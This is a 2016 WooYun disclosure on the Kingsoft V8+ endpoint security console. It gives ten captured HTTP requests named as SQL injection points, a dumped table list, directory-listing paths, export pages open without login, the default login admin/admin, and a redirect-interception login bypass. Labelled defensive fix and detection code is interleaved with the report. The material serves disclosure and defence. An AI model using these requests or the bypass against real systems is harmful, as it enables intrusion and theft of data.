
Kingsoft V8+ Endpoint Security System: 10 SQL injections (login required), insecure default configuration, backend permission bypass and other vulnerabilities (collection)

2016-05-31 01:00

First, a look at the product description:

1.jpg







There are quite a few SQL injection points; the 10 are as follows:

Code:
1.

POST /active_defense/scan/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/active_defense/scan/main.php?li=4&a=7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}





2.

POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 408
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"20","log_request_page":"2","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



3.

POST /report/report/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 205
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/report/main.php?li=5&a=14
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_report_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","period_type":"-1","count_page":"2","request_page":"1","VHierarchyID":"ADMIN"}}



4.

POST /report/log/get_log_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 409
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"100","log_request_page":"1","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



5.

POST /softmanagement/distribute/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/distribute/main.php?li=3&a=6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



6.

POST /boundary_manage/ajax.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 372
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%221%22%2C%22stype%22%3A%221%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A1%7D
Referer: **.**.**.**:6868/boundary_manage/boundary_file.php?li=2&a=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_file_name_details_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","groupids":["1"],"boundary_type":"5","time_type":"4","start_time":"0","end_time":"0","file_md5":"72C84AE241A44567B31CA2B4FB7557C9","sort_type":"download_time","sort_order":"desc","page_count":"10","current_page":"1"}}



7.

POST /client_manage/group/get_group_list_cmd.kptl HTTP/1.1
Host: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%226%22%2C%22rtype%22%3A%225%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A2%7D; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/client_manage/group/main.php?li=1&a=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



8.

POST /settings/system/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/settings/system/groups.php?li=6&a=15
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



9.

POST /softmanagement/forbidden/get_group_list_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 149
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}



10.

POST /softmanagement/forbidden/get_classify_list_info_cmd.kptl HTTP/1.1
Origin: **.**.**.**:6868
Content-Length: 288
Accept-Language: zh-CN,zh;q=0.8
Userhash: cond0r
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Host: **.**.**.**:6868
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1
Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate

{"get_classify_list_info_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","classify_id":"-1","group_id":"ADMIN","key_words":"3","count_page":"20","current_page":"1","sort_type":"state","sort_order":"desc"}}
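
As an added example (not code from the report or from the vendor) of what the fix line at the end of the report, "filtering + permissions", means for these JSON-bodied commands: the id-shaped fields are validated before anything touches the database, and every value is bound as a query parameter rather than spliced into SQL text. The GroupInfo table name is taken from the dumped table list that follows; its columns, the query, and the in-memory SQLite database are assumptions made for this example.

```python
# Added example, not code from the report or from the vendor. Shows the
# "filtering + permissions" fix for the get_group_list_cmd requests above:
# validate the GUID-shaped ids, then bind values as SQL parameters.
# GroupInfo is a table name from the dump; its columns are assumed.
import json
import re
import sqlite3

# userSession and mode_id in the captured requests are GUIDs, so any other
# shape can be rejected before the value reaches SQL.
GUID_RE = re.compile(
    r"^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$", re.I
)


def build_db():
    """Constructed in-memory stand-in for the product's SQLite master database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE GroupInfo (group_id INTEGER PRIMARY KEY, name TEXT, VHierarchyID TEXT)"
    )
    conn.executemany(
        "INSERT INTO GroupInfo (name, VHierarchyID) VALUES (?, ?)",
        [("default", "ADMIN"), ("branch-a", "SUB1"), ("branch-b", "SUB1")],
    )
    return conn


def make_body(user_session, mode_id, hierarchy_id):
    """Build a body in the shape of the get_group_list_cmd requests above."""
    return json.dumps({"get_group_list_cmd": {
        "userSession": user_session, "mode_id": mode_id, "VHierarchyID": hierarchy_id}})


def check_ids(body):
    """Filtering step on its own: True only when both ids are GUID-shaped."""
    cmd = json.loads(body)["get_group_list_cmd"]
    return all(GUID_RE.match(str(cmd.get(f, ""))) is not None
               for f in ("userSession", "mode_id"))


def get_group_list_unsafe(conn, body):
    """The defect class the report describes: a request value spliced into SQL text."""
    cmd = json.loads(body)["get_group_list_cmd"]
    sql = "SELECT name FROM GroupInfo WHERE VHierarchyID = '%s' ORDER BY group_id" % cmd["VHierarchyID"]
    return [row[0] for row in conn.execute(sql)]


def get_group_list_safe(conn, body):
    """Filtering first, then parameter binding, so the value is only ever data."""
    if not check_ids(body):
        raise ValueError("malformed userSession or mode_id")
    cmd = json.loads(body)["get_group_list_cmd"]
    hierarchy_id = str(cmd.get("VHierarchyID", ""))
    rows = conn.execute(
        "SELECT name FROM GroupInfo WHERE VHierarchyID = ? ORDER BY group_id",
        (hierarchy_id,),
    )
    return [row[0] for row in rows]
```

With the same quote-bearing VHierarchyID value, the spliced query matches every row while the bound query finds none, and a body whose ids are not GUIDs is rejected before any SQL runs. The permission half of the fix (checking that the session may see the requested hierarchy at all) sits in front of this function and is not modelled here.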

Proof of vulnerability:

555.jpg
777.jpg
666.jpg
787.jpg
665.jpg
445.jpg
234.jpg
545.jpg
887.jpg
999.jpg
100.jpg



Code:
Database: SQLite_masterdb
[69 tables]
+-----------------------------+
| ArpClientMacIp |
| ArpInfo |
| ArpInfo_History |
| ArpOptions |
| BDLogManagerOptions |
| BoundaryOptions |
| ClientDelete |
| ClientInfoCollect |
| ClientScanFinishInfo |
| ClientStaInfo |
| ClientUpdateOptions |
| ClientVersionInfo |
| ClientVirusCollect |
| DefaultPopedom |
| DomainGroupInfo |
| GroupInfo |
| HostInfo |
| HostSoftLeakScanInfo |
| HostSysLeakScanInfo |
| IPFilter |
| KChildSysCenterIPInfo |
| KClearOpenOptions |
| KFilePushInfo |
| KForbidSoftInfo |
| KGroupIP |
| KLncncCompanyInfo |
| KReport |
| KSimpleSoftInfo |
| KSoftUninstallStrategy |
| KSoftWareMgrOptions |
| KUninstallSoftInfo |
| KVDeviceGroupIP |
| KVDeviceGroupInfo |
| KVDipatcherPlanTask |
| KVMEngineOptions |
| LeakRepairStategy |
| LeakScanRepairCmd |
| MailMonOptions |
| MailMonVirusInfo |
| NetWorkManagerInfo |
| ReportIndex |
| ReportOnlineIPSet |
| ReportStrategy |
| RootWhiteListInfo |
| SCMessageLog |
| SCOperLog |
| SCOperation |
| SCUser |
| ScanConfigOptions |
| ScanOptions |
| StrongManagerOptions |
| SysMonitorOpt |
| SystemCenterTree |
| TaskOptions |
| UDiskAgentOptions |
| UDiskOptions |
| USBOptions |
| UninstallKavClientIPs |
| UserPopedom |
| VHierarchyBaseVirusDealInfo |
| VHierarchyInfo |
| VHierarchySetupInfo |
| VirusCountInfo |
| VirusInfo |
| ViuusInfoCollect |
| WatchOptions |
| _GroupInfo_old_20131010 |
| sqlite_sequence |
| webconfig |
+-----------------------------+





Insecure default configuration: the system ships with directory listing enabled by default.

A few examples:

Code:
http://**.**.**.**/boundary_manage/
**.**.**.**:6868/active_defense/
**.**.**.**:6868/report/
http://**.**.**.**/active_defense/
**.**.**.**:6868/settings/



There are many more that are not listed here; a few cases are shown below as proof.

1.jpg
2.jpg
3.jpg
4.jpg
5.jpg
6.jpg







I then found that many pages can be accessed without authorization. There are a lot of pages, so I did not try each one; the vendor should restrict them all in one go. Any file with "excel" in its name downloads the corresponding data directly.

A few of them:

Code:
**.**.**.**:6868/active_defense/scan/task.php
**.**.**.**:6868/active_defense/scan/export.php
**.**.**.**:6868/report/log/excel2.php
**.**.**.**:6868/report/log/analyse.php
**.**.**.**:6868/report/log/date_select.php
**.**.**.**:6868/report/log/excel.php
**.**.**.**:6868/report/general/ksafecount.php
http://**.**.**.**/active_defense/scan/task.php
http://**.**.**.**/boundary_manage/boundary_file_report.php
http://**.**.**.**/active_defense/scan/task.php


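
An added example, not from the report or the vendor, covering both the directory-listing directories and the unauthenticated export pages listed above: a check that runs over web-server access-log lines and flags successful directory-index responses on the module directories, and downloads from the excel/export pages that did not arrive through the console UI. The log lines are constructed in Apache combined format for the paths named in the report; the product's real log format is not shown on the page, so that format is an assumption.

```python
# Added example, not from the report or the vendor: access-log check for the
# two exposures described above (directory listing on the module directories,
# direct hits on the data-export pages). Combined log format is assumed; the
# sample lines are constructed.
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Module directories the report shows with directory listing enabled.
MODULE_DIRS = ("/active_defense/", "/report/", "/boundary_manage/", "/settings/",
               "/softmanagement/", "/client_manage/")
# Pages the report names as downloading data directly, besides anything with "excel" in the name.
EXPORT_PAGES = ("export.php", "boundary_file_report.php")

# Constructed sample log: a listing, a direct download, a normal console hit, a refused listing, junk.
SAMPLE_LOG = """\
10.0.0.5 - - [31/May/2016:01:00:01 +0800] "GET /active_defense/ HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
10.0.0.5 - - [31/May/2016:01:00:02 +0800] "GET /report/log/excel.php HTTP/1.1" 200 48120 "-" "Mozilla/5.0"
10.0.0.9 - - [31/May/2016:01:00:03 +0800] "GET /report/log/main.php?li=5&a=12 HTTP/1.1" 200 5120 "http://sc.example:6868/index.php" "Mozilla/5.0"
10.0.0.9 - - [31/May/2016:01:00:04 +0800] "GET /settings/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
this line is not a log entry
"""


def classify(line):
    """Return (rule, ip, path) when a line matches a rule, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["target"].split("?", 1)[0]
    if int(m["status"]) != 200:
        return None  # a refused listing or download is not a finding
    if path.endswith("/") and path.startswith(MODULE_DIRS):
        return ("DIR_LISTING", m["ip"], path)
    name = path.rsplit("/", 1)[-1]
    if "excel" in name or name in EXPORT_PAGES:
        # No Referer at all means the download was not reached through the console pages.
        rule = "EXPORT_DIRECT" if m["referer"] == "-" else "EXPORT"
        return (rule, m["ip"], path)
    return None


def scan(log_text):
    """Classify every line; returns the findings in log order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


def per_source(findings):
    """Count findings per (rule, ip) to see which clients are enumerating or exporting."""
    return Counter((rule, ip) for rule, ip, _ in findings)
```

The Referer heuristic is deliberately weak on its own (a client can send any Referer), so EXPORT_DIRECT is a triage signal rather than proof; the durable fix is the server-side session check on every export page plus disabling directory indexes in the web server.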



7.jpg



8.jpg



9.jpg

10.jpg





Incidentally, the backend has the default credentials admin/admin.

111.jpg



222.jpg



The unauthorized access above exposes fairly limited data, so I tested further and found that the backend can be bypassed entirely...

Every page in the system checks whether the user is logged in when accessed; the request is as follows:

Code:
GET /login.php HTTP/1.1
Host: **.**.**.**:6868
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: **.**.**.**:6868/settings/system/groups.php?li=0&a=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8



This request redirects to the login page, so all it takes is intercepting that URL in Fiddler to bypass the check.
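
An added example, not the product's code, of the difference the bypass above relies on: a login check that issues a redirect but keeps rendering, beside one that terminates the request. It is modelled as two minimal WSGI handlers; the PHPSESSID cookie name follows the captured requests, while the session store, the page body and the handler names are constructed for the example.

```python
# Added example, not the product's code: a login gate that only redirects
# versus one that terminates the request. Cookie name taken from the captured
# requests; session store and page body are constructed.
from http.cookies import SimpleCookie

SESSION_COOKIE = "PHPSESSID"
VALID_SESSIONS = {"sess-demo-0001"}  # constructed session store
PAGE_BODY = b"<html>group settings (constructed protected content)</html>"


def logged_in(environ):
    """True when the request carries a session cookie that the server knows."""
    cookie = SimpleCookie(environ.get("HTTP_COOKIE", ""))
    morsel = cookie.get(SESSION_COOKIE)
    return morsel is not None and morsel.value in VALID_SESSIONS


def groups_page_flawed(environ, start_response):
    """Redirect issued, but rendering continues: the protected page still
    leaves the server in the body of the 302. A proxy that drops the
    redirect, as the report describes, shows that body anyway."""
    if logged_in(environ):
        start_response("200 OK", [("Content-Type", "text/html")])
    else:
        start_response("302 Found", [("Location", "/login.php"), ("Content-Type", "text/html")])
    return [PAGE_BODY]


def groups_page_fixed(environ, start_response):
    """The authorization decision ends the handler; only the redirect is sent."""
    if not logged_in(environ):
        start_response("302 Found", [("Location", "/login.php")])
        return [b""]
    start_response("200 OK", [("Content-Type", "text/html")])
    return [PAGE_BODY]


def call(app, cookie_header=None):
    """Drive a handler in-process, standing in for the browser or an
    intercepting proxy. Returns (status, headers, body)."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/settings/system/groups.php"}
    if cookie_header:
        environ["HTTP_COOKIE"] = cookie_header
    captured = {}

    def start_response(status, headers):
        captured["status"] = status
        captured["headers"] = dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body
```

Blocking the 302 in a proxy cannot recover content that was never sent, and the same rule covers every page the report lists as reachable without authorization: the server-side check has to return before any data is emitted. Directory listing is a separate web-server setting and is not addressed by this handler.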

z11.jpg





It is then possible to view the system configuration and passwords, edit the announcement (and the announcement field has an XSS), and upload "popular tools"...

Here is the effect:

z1.jpg



z2.jpg



z3.jpg



z4.jpg



z5.jpg



z6.jpg



z7.jpg



z8.jpg



z9.jpg



z10.jpg



Fix:

Filtering + permissions

Source: www.wooyun.org/bugs/wooyun-2016-0179804
